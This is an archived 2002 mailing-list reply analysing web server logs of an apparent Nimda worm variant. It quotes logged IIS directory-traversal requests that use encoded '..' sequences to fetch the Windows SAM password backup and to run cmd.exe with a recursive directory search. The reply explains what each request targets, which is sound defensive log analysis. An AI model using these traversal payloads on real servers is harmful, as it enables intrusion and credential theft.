Re: [logs] nimda web server logs

From: Sweth Chandramouli (loganalysisat_private)
Date: Tue Jun 11 2002 - 13:53:03 PDT

  • Next message: Sweth Chandramouli: "Re: [logs] nimda web server logs"

    On Tue, Jun 11, 2002 at 08:03:12PM +0000, Tina Bird wrote:
    > Here's what I'm seeing -- anyone have any information on this variant?
    	Haven't seen it, myself, but what I see here worries me:
    
    > Jun 10 12:53:39.675 <information deleted> op=GET arg=http://Target
    > IP/a.asp/..%c1%1c../..%c1%1c../winnt/repair/sam result="404 Object Not
    > Found"
    > 
    > Jun 10 12:53:43.578 <information deleted> op=GET arg=http://Target
    > IP/a.asp/..%c1%9c../..%c1%9c../winnt/repair/sam result="404 Object Not
    > Found"
    	These seem pretty straightforward--attempts to get the
    backup copy of the SAM file (the windows equiv of /etc/shadow).
    
    > Jun 10 12:53:37.845 <information deleted> op=GET arg=http://Target
    > IP/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:
    > \\*.cif/s/b result="500 Server Error"
    	This is the one that scares me; it's attempting to run a
    recursive directory search on your C drive to find your Internet
    Explorer component information file--the file that, for example, Windows
    Update uses to determine what patches you have installed.  Presumably, if
    that request succeeded, it would then download the CIF to find out what
    version of IE you have, etc., and try only those exploits of relevance.
    It looks like the script kiddies are getting smarter...
    
    	-- Sweth.
    
    -- 
    Sweth Chandramouli      Idiopathic Systems Consulting
    svcat_private      http://www.idiopathic.net/
    
    ---------------------------------------------------------------------
    To unsubscribe, e-mail: loganalysis-unsubscribeat_private
    For additional commands, e-mail: loganalysis-helpat_private
    



    This archive was generated by hypermail 2b30 : Tue Jun 11 2002 - 16:45:44 PDT